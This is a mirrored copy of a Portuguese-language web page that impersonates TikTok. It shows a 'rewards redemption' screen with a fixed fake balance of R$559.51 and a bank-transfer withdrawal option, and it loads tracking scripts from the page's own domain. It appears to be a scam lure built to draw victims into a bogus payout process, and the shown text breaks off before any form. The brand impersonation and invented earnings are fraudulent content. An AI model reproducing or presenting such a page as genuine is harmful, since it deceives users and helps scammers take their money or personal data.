<!DOCTYPE html><html lang="pt-BR">
<!-- Mirrored from avalienahora.shop/tiktoksaque/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 May 2025 18:18:49 GMT -->
<head>
	<meta charset="UTF-8">
		<title>Saque – TikTok</title>
<meta name="robots" content="max-image-preview:large">
	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
	<link rel="alternate" type="application/rss+xml" title="Feed para TikTok »" href="https://respostaspremiada.com/feed/">
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para TikTok »" href="https://respostaspremiada.com/comments/feed/">
<script async="" src="js/c9kppezqhnzt.js"></script><script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/respostaspremiada.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
</style>
<style id="global-styles-inline-css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:root { --wp--style--global--content-size: 800px;--wp--style--global--wide-size: 1200px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.wp-site-blocks) > * { margin-block-start: 24px; margin-block-end: 0; }:where(.wp-site-blocks) > :first-child { margin-block-start: 0; }:where(.wp-site-blocks) > :last-child { margin-block-end: 0; }:root { --wp--style--block-gap: 24px; }:root :where(.is-layout-flow) > :first-child{margin-block-start: 0;}:root :where(.is-layout-flow) > :last-child{margin-block-end: 0;}:root :where(.is-layout-flow) > *{margin-block-start: 24px;margin-block-end: 0;}:root :where(.is-layout-constrained) > :first-child{margin-block-start: 0;}:root :where(.is-layout-constrained) > :last-child{margin-block-end: 0;}:root :where(.is-layout-constrained) > *{margin-block-start: 24px;margin-block-end: 0;}:root :where(.is-layout-flex){gap: 24px;}:root :where(.is-layout-grid){gap: 24px;}.is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}a:where(:not(.wp-element-button)){text-decoration: underline;}:root :where(.wp-element-button, .wp-block-button__link){background-color: #32373c;border-width: 0;color: #fff;font-family: inherit;font-size: inherit;line-height: inherit;padding: calc(0.667em + 2px) calc(1.333em + 2px);text-decoration: none;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}
</style>
<link rel="stylesheet" id="hello-elementor-css" href="css/style.min.css" media="all">
<link rel="stylesheet" id="hello-elementor-theme-style-css" href="css/theme.min.css" media="all">
<link rel="stylesheet" id="hello-elementor-header-footer-css" href="css/header-footer.min.css" media="all">
<link rel="stylesheet" id="elementor-frontend-css" href="css/frontend.min.css" media="all">
<link rel="stylesheet" id="elementor-post-5-css" href="css/post-5.css" media="all">
<link rel="stylesheet" id="elementor-icons-css" href="css/elementor-icons.min.css" media="all">
<link rel="stylesheet" id="widget-heading-css" href="css/widget-heading.min.css" media="all">
<link rel="stylesheet" id="widget-image-css" href="css/widget-image.min.css" media="all">
<link rel="stylesheet" id="widget-counter-css" href="css/widget-counter.min.css" media="all">
<link rel="stylesheet" id="widget-divider-css" href="css/widget-divider.min.css" media="all">
<link rel="stylesheet" id="widget-form-css" href="css/widget-form.min.css" media="all">
<link rel="stylesheet" id="widget-text-editor-css" href="css/widget-text-editor.min.css" media="all">
<link rel="stylesheet" id="elementor-post-1174-css" href="css/post-1174.css" media="all">
<link rel="stylesheet" id="eael-general-css" href="css/general.min.css" media="all">
<link rel="stylesheet" id="google-fonts-1-css" href="https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CInter%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;display=swap&amp;ver=6.7.1" media="all">
<link rel="stylesheet" id="elementor-icons-shared-0-css" href="css/fontawesome.min.css" media="all">
<link rel="stylesheet" id="elementor-icons-fa-regular-css" href="css/regular.min.css" media="all">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><script src="js/jquery.min.js" id="jquery-core-js"></script>
<script src="js/jquery-migrate.min.js" id="jquery-migrate-js"></script>
<link rel="https://api.w.org/" href="https://respostaspremiada.com/wp-json/"><link rel="alternate" title="JSON" type="application/json" href="https://respostaspremiada.com/wp-json/wp/v2/pages/1174"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://respostaspremiada.com/xmlrpc.php?rsd">
<meta name="generator" content="WordPress 6.7.1">
<link rel="canonical" href="https://respostaspremiada.com/tiktoksaque/">
<link rel="shortlink" href="https://respostaspremiada.com/?p=1174">
<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://respostaspremiada.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frespostaspremiada.com%2Ftiktoksaque%2F">
<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://respostaspremiada.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frespostaspremiada.com%2Ftiktoksaque%2F&amp;format=xml">

		<!-- Google Tag Manager -->
		<script>!function(){"use strict";function l(e){for(var t=e,r=0,n=document.cookie.split(";");r<n.length;r++){var o=n[r].split("=");if(o[0].trim()===t)return o[1]}}function s(e){return localStorage.getItem(e)}function u(e){return window[e]}function A(e,t){e=document.querySelector(e);return t?null==e?void 0:e.getAttribute(t):null==e?void 0:e.textContent}var e=window,t=document,r="script",n="dataLayer",o="https://api.respostaspremiada.com/",a="",i="c9pezqhnzt",c="BBB=aWQ9R1RNLUtKOUozUjRG&page=1",g="cookie",v="_sbp",E="",d=!1;try{var d=!!g&&(m=navigator.userAgent,!!(m=new RegExp("Version/([0-9._]+)(.*Mobile)?.*Safari.*").exec(m)))&&16.4<=parseFloat(m[1]),f="stapeUserId"===g,I=d&&!f?function(e,t,r){void 0===t&&(t="");var n={cookie:l,localStorage:s,jsVariable:u,cssSelector:A},t=Array.isArray(t)?t:[t];if(e&&n[e])for(var o=n[e],a=0,i=t;a<i.length;a++){var c=i[a],c=r?o(c,r):o(c);if(c)return c}else console.warn("invalid uid source",e)}(g,v,E):void 0;d=d&&(!!I||f)}catch(e){console.error(e)}var m=e,g=(m[n]=m[n]||[],m[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"}),t.getElementsByTagName(r)[0]),v=I?"&bi="+encodeURIComponent(I):"",E=t.createElement(r),f=(d&&(i=8<i.length?i.replace(/([a-z]{8}$)/,"kp$1"):"kp"+i),!d&&a?a:o);E.async=!0,E.src=f+"/"+i+".js?"+c+v,null!=(e=g.parentNode)&&e.insertBefore(E,g)}();</script>
		<!-- End Google Tag Manager -->
		<meta name="generator" content="Elementor 3.26.3; features: additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap">
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
			<style>
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
					background-image: none !important;
				}
				@media screen and (max-height: 1024px) {
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
				@media screen and (max-height: 640px) {
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
			</style>
			<link rel="icon" href="images/cropped-622e383d-a968-4ce6-8efa-0d2d91fc9977-gif-tiktok-e1735776294167-32x32.webp" sizes="32x32">
<link rel="icon" href="images/cropped-622e383d-a968-4ce6-8efa-0d2d91fc9977-gif-tiktok-e1735776294167-192x192.webp" sizes="192x192">
<link rel="apple-touch-icon" href="images/cropped-622e383d-a968-4ce6-8efa-0d2d91fc9977-gif-tiktok-e1735776294167-180x180.webp">
<meta name="msapplication-TileImage" content="https://respostaspremiada.com/wp-content/uploads/2025/01/cropped-622e383d-a968-4ce6-8efa-0d2d91fc9977-gif-tiktok-e1735776294167-270x270.webp">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"><script src="js/wp-emoji-release.min.js" defer=""></script></head>
<body class="page-template page-template-elementor_canvas page page-id-1174 wp-custom-logo wp-embed-responsive elementor-default elementor-template-canvas elementor-kit-5 elementor-page elementor-page-1174">
			<div data-elementor-type="wp-page" data-elementor-id="1174" class="elementor elementor-1174" data-elementor-post-type="page">
				<div class="elementor-element elementor-element-bec9c4e e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="bec9c4e" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-582b39d elementor-widget-mobile__width-auto elementor-view-default elementor-widget elementor-widget-icon" data-id="582b39d" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<a class="elementor-icon" href="#">
			<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"><g clip-path="url(#clip0_286_576)"><path d="M14 7L9 12" stroke="black" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path><path d="M9 12L14 17" stroke="black" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></g><defs><clipPath id="clip0_286_576"><rect width="24" height="24" fill="white"></rect></clipPath></defs></svg>			</a>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-dc7379d elementor-widget-mobile__width-auto elementor-widget elementor-widget-heading" data-id="dc7379d" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Resgatar recompensas</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-c94058b elementor-widget-mobile__width-auto elementor-view-default elementor-widget elementor-widget-icon" data-id="c94058b" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<a class="elementor-icon" href="#">
			<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"><path d="M9.14648 9.07361C9.31728 8.54732 9.63015 8.07896 10.0508 7.71948C10.4714 7.36001 10.9838 7.12378 11.5303 7.03708C12.0768 6.95038 12.6362 7.0164 13.1475 7.22803C13.6587 7.43966 14.1014 7.78875 14.4268 8.23633C14.7521 8.68391 14.9469 9.21256 14.9904 9.76416C15.0339 10.3158 14.9238 10.8688 14.6727 11.3618C14.4215 11.8548 14.0394 12.2685 13.5676 12.5576C13.0958 12.8467 12.5533 12.9998 12 12.9998V14.0002M12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21ZM12.0498 17V17.1L11.9502 17.1002V17H12.0498Z" stroke="black" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></svg>			</a>
		</div>
						</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-d08e188 e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="d08e188" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-d2728f9 e-flex e-con-boxed e-con e-child" data-id="d2728f9" data-element_type="container" data-settings="{" background_background":"classic"}"="">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-2b4a08f elementor-widget elementor-widget-image" data-id="2b4a08f" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img decoding="async" width="69" height="69" src="images/Group-3-1.png.webp" class="attachment-large size-large wp-image-1364" alt="">															</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-a414568 e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="a414568" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-4605e33 e-con-full e-flex e-con e-child" data-id="4605e33" data-element_type="container">
				<div class="elementor-element elementor-element-9a6ee15 elementor-widget elementor-widget-heading" data-id="9a6ee15" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Seu saldo</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-a5037d2 elementor-widget elementor-widget-counter" data-id="a5037d2" data-element_type="widget" data-widget_type="counter.default">
				<div class="elementor-widget-container">
							<div class="elementor-counter">
						<div class="elementor-counter-number-wrapper">
				<span class="elementor-counter-number-prefix">R$559.5</span>
				<span class="elementor-counter-number" data-duration="2000" data-to-value="559.51" data-from-value="559.51" data-delimiter=",">1</span>
				<span class="elementor-counter-number-suffix"></span>
			</div>
		</div>
						</div>
				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-3323473 e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="3323473" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-36a42d2 e-flex e-con-boxed e-con e-child" data-id="36a42d2" data-element_type="container" data-settings="{" background_background":"classic"}"="">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-b201e0c elementor-widget elementor-widget-heading" data-id="b201e0c" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Últimas recompensas: R$54.87</h2>				</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-fc621da e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="fc621da" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-fa73739 e-flex e-con-boxed e-con e-child" data-id="fa73739" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-684dcd5 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="684dcd5" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-488c0db e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="488c0db" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-a6f62e4 e-con-full e-flex e-con e-child" data-id="a6f62e4" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-e3f6d2a e-con-full e-flex e-con e-child" data-id="e3f6d2a" data-element_type="container">
				<div class="elementor-element elementor-element-dffe948 elementor-widget-mobile__width-initial elementor-widget elementor-widget-heading" data-id="dffe948" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Sacar dinheiro</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-fd724ba e-con-full e-flex e-con e-child" data-id="fd724ba" data-element_type="container">
				<div class="elementor-element elementor-element-b69d4f0 elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="b69d4f0" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<i aria-hidden="true" class="far fa-credit-card"></i>			</div>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-dc6f915 elementor-widget-mobile__width-initial elementor-widget elementor-widget-heading" data-id="dc6f915" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Transferência bancária    /</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-b34de8a elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="b34de8a" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
